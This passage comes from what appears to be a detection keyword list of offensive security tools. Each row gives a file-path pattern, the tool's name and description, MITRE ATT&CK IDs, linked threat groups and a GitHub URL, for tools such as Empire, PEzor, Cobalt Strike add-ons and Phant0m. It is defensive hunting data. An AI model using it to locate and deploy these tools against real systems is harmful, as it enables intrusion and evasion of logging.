,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/persistence/*.psm1,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1134,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/Persistence/InstallUtil.*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/persistence2.rc*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/peterspbr/dirty-pipe-otw*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/peterspbr/dirty-pipe-otw,1,1,N/A,N/A,1,1,0,2022-03-10T03:42:15Z,2022-03-09T17:21:17Z -*/PetitPotam.git*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*/PEzor.cna*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/PEzor.git*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/PEzor.sh *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/PEzor/inject.cpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/pfsense_clickjacking*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/pgsql-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Phant0m.git*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*/phant0m-exe*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*/phishing.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/Phishing.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*/phishing/*.html*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/phishing/password_box*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/PhishingServer/*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/pid:1337 */dll:*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*/ping6.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/PipeViewer.exe*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*/PipeViewer.git*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*/PipeViewer.sln*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*/PipeViewer/Program.cs*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*/pitty_tiger.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/pivotnacci.git*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,1,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*/pivotnaccilib*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,0,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*/pjl-info-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nccgroup/nmap-nse-vulnerability-scripts,1,1,N/A,N/A,7,620,64,2022-03-04T09:08:55Z,2021-05-18T15:20:30Z -*/pjl-ready-message.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/pkg/state/sudoers.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/PKINITtools*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,1,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z -*/Plazmaz/LNKUp*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/PoC/PrivilegeEscalation*,offensive_tool_keyword,echoac-poc,poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/kite03/echoac-poc,1,1,N/A,8,2,118,25,2023-08-03T04:09:38Z,2023-06-28T00:52:22Z -*/POC_DLL.vcxproj*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*/PoC-CVE-2023-21554*,offensive_tool_keyword,poc,Windows Message Queuing vulnerability exploitation with custom payloads,T1192 - T1507,TA0002,N/A,N/A,Network Exploitation Tools,https://github.com/Hashi0x/PoC-CVE-2023-21554,1,1,N/A,N/A,,N/A,,, -*/poisoners/*.py,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/polenum.py*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*/pop3-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/pop3-capabilities.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/pop3-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/popCalc.bin*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/spawn,1,1,N/A,10,10,407,71,2023-03-08T15:53:44Z,2021-07-17T16:35:59Z -*/PortBender/*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*/portscan.cna*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*/portscan.yaml*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*/port-states.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/POSeidon.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/posh.key*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 